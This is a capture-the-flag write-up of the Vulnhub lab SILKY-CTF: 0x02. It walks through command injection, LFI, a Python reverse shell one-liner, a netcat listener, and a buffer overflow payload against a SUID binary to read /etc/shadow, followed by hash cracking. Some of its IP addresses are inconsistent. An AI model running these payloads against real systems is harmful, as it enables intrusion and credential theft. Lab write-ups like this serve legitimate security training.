Today we will be solving a boot2root lab from Vulnhub called SILKY-CTF: 0x02. This lab is a good way to keep your penetration testing skills on point while getting some variety.
Download it from HERE
Task: Boot to Root (flag.txt)
- Directory Scanning using DIRB
- Giving Credentials For Admin Login
- Exploiting Command Injection Vulnerability
- Fuzzing to exploit LFI Vulnerability
- Reading /etc/passwd file
- Getting a reverse connection using Python Reverse Shell
- Spawning a TTY Shell
- Getting SUID File
- Exploiting Buffer Overflow Vulnerability using Bad Chars and Python Script
- Decoding Hashes using John
Capturing the flag
Let’s start by scanning the network for targets using Netdiscover.
We found target IP Address 192.168.1.23. Let’s begin with basic port scanning with NMAP
nmap –A –sV 192.168.0.23
NMAP scanning result wasn’t much use to us. So, we thought of executing Directory Brute force in order to enumerate the machine further. This gave us a directory “admin.php”. This seems quite interesting.
After browsing the directory on the browser, it turned out to be Admin Login Panel. This might be useful to follow up.
We Clicked on Login and Got a Login form to give Admin’s Username & Password. We tried different methods to access the Admin Panel but were shutdown.
We thought of logging in with random credentials.
Noticing the error was in the German Language. That’s Different!!
After spending a few time looking for a way. It clearly strikes to check LFI in the URL as shown in the image. We have successfully executed the ls command which means it is vulnerable to command injection.
To confirm the LFI, we did some Fuzzing and found the /etc/passwd file.
Moving on, we looked for a Flag.txt in the Silky home directory.
It’s time to execute a Python Reverse Shell to get a reverse connection. But before executing the shell establish a Netcat listener on your machine. Given below is the Python reverse shell we have used in the URL to obtain a reverse connection on our Netcat listener.
python –c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.0.23”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
Oh Yeah!! We got the reverse shell on our Netcat listener, but it is not a proper shell. We will spawn this tty shell using python.
nc –lvp 4444
python –c ‘import pty;pty.spawn(“/bin/bash”)’
While enumerating the directories of the machine, we found a SUID file cat_shadow. This might come in handy. Let’s see.
On checking what this file actually does by executing it. We noticed it’s trying to read the shadow file but on the other hand we got permission denied.
We clearly knew we need to send that HEX value since it seemed it is vulnerable to Buffer Overflow Vulnerability.
./cat_shadow $(python –c ‘print “A”*100’)
After some trials, we wrote a simple python script to write 64 bad characters of “A” and then adds the value of “0x496c5962” in little-endian format and provide the result as input to the “cat_shadow” file and was able to read the “/etc/shadow” file.
./cat_shadow $(python –c ‘print “A”*64 + “\x62\x59\x6c\x49″‘)
Now we have simply copied the hashes in a file on our Kali Linux and Fired UP!! John to decode the hashes. After some time, we got the password for root. I guess there is only one thing left to do is to read our Final Flag.
We logged in to Root User using the found credentials and easily got our way to the Final Flag.
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here